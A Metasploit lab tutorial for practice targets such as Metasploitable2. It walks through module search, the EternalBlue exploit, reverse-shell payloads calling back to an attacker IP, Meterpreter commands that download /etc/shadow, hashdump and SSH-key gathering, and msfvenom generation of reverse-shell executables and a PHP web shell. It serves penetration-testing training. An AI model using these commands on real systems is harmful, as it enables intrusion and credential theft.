๐ฏ Lab Objectives
- Navigate the msfconsole interface and understand the module structure
- Search for, select, and configure exploit modules
- Understand the difference between staged and stageless payloads
- Gain a Meterpreter shell and navigate it effectively
- Perform basic post-exploitation: system info, privilege check, file access
- Generate standalone payloads with MSFvenom
Authorised Use Only. Metasploit is a powerful exploitation framework. Only use it against systems you own or have explicit written permission to test. Use Metasploitable2 or a local VM as your practice target.
What is Metasploit?
The Metasploit Framework is the world's most widely used penetration testing platform, developed by Rapid7. It contains hundreds of pre-built exploits, payloads, encoders, and post-exploitation modules โ letting you go from vulnerability to shell quickly and reliably.
Key components:
- Exploits โ Code that takes advantage of a vulnerability
- Payloads โ Code that runs on the target after exploitation (e.g. a shell)
- Auxiliaries โ Scanners, fuzzers, and other support modules
- Post modules โ Post-exploitation: credential dumping, pivoting, persistence
- Encoders โ Obfuscate payloads to evade AV detection
Step 1 โ Starting msfconsole
1
Launch and initialise Metasploit
# Start the PostgreSQL database (Metasploit uses it to store data)
sudo systemctl start postgresql
# Initialise the database on first run
sudo msfdb init
# Launch the console
sudo msfconsole
# Verify database connection
msf6 > db_status
Connected to msf. Connection type: postgresql.
# Check version
msf6 > versionStep 2 โ Searching for Modules
2
Find the right exploit or module
# Search by keyword
msf6 > search eternalblue
msf6 > search type:exploit platform:linux apache
# Search by CVE number
msf6 > search cve:2021-44228
# Search by service
msf6 > search name:smb type:exploit
# List all auxiliary scanners for a service
msf6 > search type:auxiliary name:sshThe search results show a Rank column. Ranks from best to worst: excellent, great, good, normal, average, low, manual. Always prefer excellent or great ranked modules.
Step 3 โ Using an Exploit Module
3
Select a module and examine its options
# Use a module (by number from search results or full path)
msf6 > use exploit/multi/handler
msf6 > use 0 # use first result from last search
# Example: MS17-010 EternalBlue (SMB exploit)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show all required and optional options
msf6 exploit(ms17_010_eternalblue) > show options
# Get detailed info about the module
msf6 exploit(ms17_010_eternalblue) > infoStep 4 โ Understanding Payloads
A payload is what runs on the target machine after the exploit succeeds. The two main types are:
- Staged (
windows/x64/meterpreter/reverse_tcp) โ Small stager connects back, then downloads the full payload. Smaller size, needs two connections. - Stageless (
windows/x64/meterpreter_reverse_tcp) โ Full payload in one. Larger but self-contained. Better for unstable networks.
# List payloads compatible with current exploit
msf6 exploit(ms17_010_eternalblue) > show payloads
# Common payloads
# Windows reverse Meterpreter (staged)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Linux reverse shell (staged)
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Simple bash reverse shell
set PAYLOAD cmd/unix/reverse_bashStep 5 โ Setting Options
5
Configure RHOST, LHOST, LPORT and other required options
# Set target host
set RHOSTS 10.10.10.1
set RHOSTS 192.168.1.0/24 # entire subnet
# Set your attack machine IP (for reverse shells)
set LHOST 10.10.14.5
set LHOST tun0 # use VPN interface name directly
# Set listening port
set LPORT 4444
# Verify all options are set correctly
show options
# Check if target appears vulnerable
checkStep 6 โ Running the Exploit
6
Launch the exploit and catch a shell
# Run the exploit
run
# or:
exploit
# Run as a background job
exploit -j
# List background jobs
jobs
# List active sessions
sessions -l
# Interact with session 1
sessions -i 1Step 7 โ Meterpreter Basics
Meterpreter is Metasploit's advanced payload that runs entirely in memory, making it hard to detect. It gives you a rich set of commands to interact with the target.
7
Essential Meterpreter commands
# System information
meterpreter > sysinfo
meterpreter > getuid # current user
meterpreter > getpid # process ID
# File system navigation
meterpreter > pwd
meterpreter > ls
meterpreter > cd /tmp
meterpreter > cat /etc/passwd
# Download / upload files
meterpreter > download /etc/shadow /tmp/shadow
meterpreter > upload /tmp/payload.sh /tmp/
# Drop into a system shell
meterpreter > shell
# Background the session
meterpreter > background
# Screenshot (Windows targets)
meterpreter > screenshotStep 8 โ Post-Exploitation Modules
8
Use post modules on an active session
# From msfconsole with active session in background
# Dump password hashes (Windows)
use post/windows/gather/hashdump
set SESSION 1
run
# Enumerate installed applications
use post/windows/gather/enum_applications
set SESSION 1
run
# Linux: gather SSH keys
use post/linux/gather/enum_configs
set SESSION 1
run
# Privilege escalation suggestions
use post/multi/recon/local_exploit_suggester
set SESSION 1
runStep 9 โ MSFvenom Payload Generation
MSFvenom is a standalone tool for generating payloads outside of msfconsole. Use it when you need a file to deliver to a target rather than using Metasploit directly.
# List all payload formats
msfvenom --list formats
# Windows reverse Meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f elf -o payload.elf
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f raw -o shell.php
# Python one-liner
msfvenom -p cmd/unix/reverse_python \
LHOST=10.10.14.5 LPORT=4444 -f raw
# Start a listener to catch the payload
msf6 > use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run๐ Metasploit Cheat Sheet
| Command | Description |
|---|---|
search <term> | Search modules by keyword/CVE |
use <module> | Select a module |
info | Show module details |
show options | Show required/optional settings |
show payloads | Compatible payloads |
set <OPT> <val> | Set an option |
check | Test if target is vulnerable |
run / exploit | Execute the module |
sessions -l | List active sessions |
sessions -i 1 | Interact with session 1 |
background | Background current session |
getuid | Show current user (Meterpreter) |
getsystem | Attempt privilege escalation |
hashdump | Dump Windows password hashes |
shell | Drop to OS shell |
download / upload | Transfer files |
Lab Complete! You can now use Metasploit to find, configure, and run exploits. Next, learn how to crack credentials with John the Ripper and Hashcat.